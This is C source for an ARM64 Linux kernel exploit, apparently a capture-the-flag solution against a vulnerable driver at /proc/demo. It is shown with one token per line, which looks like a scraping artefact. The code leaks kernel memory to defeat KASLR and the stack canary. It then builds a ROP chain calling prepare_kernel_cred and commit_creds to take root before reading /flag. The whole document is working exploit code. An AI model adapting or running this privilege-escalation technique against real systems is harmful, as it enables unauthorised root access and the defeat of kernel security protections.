size_t commit_creds, prepare_kernel_cred
=
0
;
/
/
0xffff8000080a2258
0xffff8000080a24f8
size_t kernel_base,offset
=
0
;
/
/
0xffff800008000000
size_t gadget2
=
0
;
void shell(void)
{
/
/
int
uid
=
getuid();
/
/
printf(
"uid == %d\n"
,uid);
/
/
system(
"/bin/sh"
);
char buf[
0x40
]
=
{
0
};
int
fd
=
open
(
"/flag"
,
0
);
read(fd, buf,
0x40
);
write(
1
, buf,
0x40
);
}
int
main()
{
int
fd
=
open
(
"/proc/demo"
,
2
);
if
(fd <
0
)
{
puts(
"open error"
);
exit(
-
1
);
}
size_t leak[
0x200
]
=
{
0
};
read(fd, leak,
0x1f8
);
for
(
int
i
=
0
; i <
36
; i
+
+
)
{
printf(
"id %d : 0x%llx\n"
,i,leak[i]);
}
size_t kernel_addr
=
leak[
2
];
size_t canary
=
leak[
12
];
printf(
"kerenl_addr== 0x%llx , canary == 0x%llx\n"
,kernel_addr,canary);
offset
=
kernel_addr
-
0xffff8000082376f8
;
kernel_base
=
0xffff800008000000
+
offset;
/
/
ffffd587d10a2258
0xffffd587d10a2258
,
commit_creds
=
kernel_base
+
0xa2258
;
prepare_kernel_cred
=
kernel_base
+
0xa24f8
;
gadget2
=
kernel_base
+
0x16950
;
printf(
"kerenl_base== 0x%llx ,commit_creds == 0x%llx, prepare_kernel_cred == 0x%llx\n"
,kernel_base,commit_creds,prepare_kernel_cred);
printf(
"%p\n"
,leak);
leak[
13
]
=
0x4141414141414141
;
leak[
14
]
=
0x4141414141414141
;
leak[
16
]
=
canary;
leak[
18
]
=
gadget2;
leak[
19
]
=
0
;
leak[
20
]
=
0
;
leak[
21
]
=
0x8888888888888888
;
leak[
22
]
=
prepare_kernel_cred
+
4
;
leak[
32
]
=
commit_creds
+
4
;
leak[
33
]
=
0x1111111111111111
;
leak[
36
]
=
gadget2;
leak[
37
]
=
0x7777777777777777
;
leak[
38
]
=
canary;
leak[
39
]
=
0x2222222222222222
;
leak[
40
]
=
0x3333333333333333
;
leak[
41
]
=
(size_t)leak;
/
/
x29 far_el1
=
0x00ffffc150b790
leak[
42
]
=
kernel_base
+
0x11fe4
;
/
/
x30
leak[
43
]
=
0x6666666666666666
;
/
/
x19
leak[
44
]
=
0x7777777777777777
;
/
/
x20
leak[
45
]
=
(size_t)shell;
/
/
x21 elr_el1
=
0x41f518
leak[
46
]
=
0x80001000
;
/
/
x22 spsr_el1
=
0x80001000
leak[
47
]
=
(size_t)leak;
/
/
x23 sp_el0
=
0x00ffffc150b790
leak[
48
]
=
0x2222222222222222
;
/
/
x24
leak[
49
]
=
0x3333333333333333
;
/
/
x25
leak[
51
]
=
0x4444444444444444
;
write(fd, leak,
0x200
);
close(fd);
return
0
;
};